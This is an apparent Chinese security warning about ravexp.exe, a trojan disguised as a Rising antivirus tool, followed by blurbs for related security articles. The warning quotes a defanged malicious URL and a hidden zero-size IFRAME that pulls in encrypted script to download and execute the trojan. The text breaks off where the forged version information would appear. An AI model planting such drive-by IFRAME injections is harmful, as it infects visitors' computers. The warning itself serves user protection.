小心冒充瑞星专家的病毒ravexp.exe

简介: 小心冒充瑞星专家的病毒ravexp.exe

打开URL:

/------
hxxp://www.%6E%6A***%74%73%69***%73.com/images/ravexpert.jpg
------/

你会看到一张图片,其实这个URL指向的是一个网页,包含代码:

/------
<IFRAME align=center name="target" frameBorder=0 height=0 scrolling=no src="hxxp://www.n**j**tsi**s.com/n**j**s**ex/vip**_reg*.htm"width=0></IFRAME>
------/

vip*_reg**.htm  包含双重加密的脚本代码,第一重是escape()加密的JavaScript代码,第二重是自定义函数rechange(t)加密的VBScript代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 ravexp.exe,并利用Shell.Application 对象MircoLonge 的 ShellExecute 方法 来运行。

ravexp.exe 采用PESHiELD 0.1b MTE -> ANAKiN加壳,不仅使用类似瑞星的金狮子头作为图标,而且版本信息是伪造瑞星的:

/------


相关文章
|
7天前
|
安全
[2006-04-12]一个下载传奇盗号木马的网站(第2版)
[2006-04-12]一个下载传奇盗号木马的网站(第2版)
|
安全 网络安全 Windows
向日葵RCE(CNVD-2022-10270)
向日葵RCE(CNVD-2022-10270)
208 0
|
Web App开发 安全
卡巴斯基提醒网民注意:压缩文件也能变木马
普通计算机用户一般都通过所下载文件的图标来判断文件类型,但这一方法并非绝对安全。很多病毒会修改自身的显示图标,伪装成正常文件,诱使用户点击运行。卡巴斯基实验室近期就检测到一种名为“首页修改大师”的木马(Trojan-Dropper.Win32.StartPage.cr),这种木马采用WINRAR压缩工具的图标迷惑用户,其实本身是一个exe可执行文件,一旦计算机用户不小心运行了该文件,系统就会被感染。
1120 0
|
安全
Windows10被曝漏洞,受害者电脑沦为“肉鸡”
一旦被攻击者利用,电脑里的任何应用都可能拥有系统权限,攻击者可以执行危害级别更高的恶意行为,受害者电脑沦为“肉鸡”。
432 0
|
安全 Windows 网络安全
威胁快报|Bulehero挖矿蠕虫升级,PhpStudy后门漏洞加入武器库
近日,阿里云安全团队监控到Bulehero挖矿蠕虫进行了版本升级,蠕虫升级后开始利用最新出现的PHPStudy后门漏洞作为新的攻击方式对Windows主机进行攻击,攻击成功后会下载门罗币挖矿程序进行牟利。建议用户及时排查自身主机是否存在安全漏洞,并关注阿里云安全团队的相关文章。
3253 0
|
云安全 安全
瑞星杀毒网络版2010发布 称可查杀99.9%木马
4月15日,亚洲最大的信息安全厂商瑞星公司召开隆重发布会,正式发布2010年企业级旗舰产品——“瑞星杀毒软件网络版2010”系列。该系列产品包括六种版本,产品适用范围覆盖了小型企业、大中型企业、金融机构以及政府单位等所有企业级用户。
1129 0
|
Web App开发 安全 数据安全/隐私保护
McAfee:黑客借"极光漏洞"获取企业源代码
在周三的RSA 2010大会发言中,McAfee的研究人员表示,以获取企业源代码为目的的网络犯罪正在盛行,而企业对此方面的保护略显不足。 在RSA 2010上,McAfee展示了一个分析报告,关于对Perforce公司(一个做住房产权软件的公司)的调查。
881 0
|
安全
大量计算机遭“灰鸽子”病毒攻击
国家计算机病毒应急处理中心通过互联网络监测发现,近期大量计算机用户受到“灰鸽子”及变种的威胁,且感染数量不断上升,用户需小心谨防。 据介绍,“灰鸽子”一般分为两部分:客户端和服务端。恶意攻击者操纵着客户端,利用客户端配置生成一个服务端程序。
1406 0
|
云安全 安全 jenkins
威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板”
简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件。除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患。 由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误认为是漏洞发现者在进行测试,因此我们将木马命名为ImposterMiner(冒充者)。
9234 0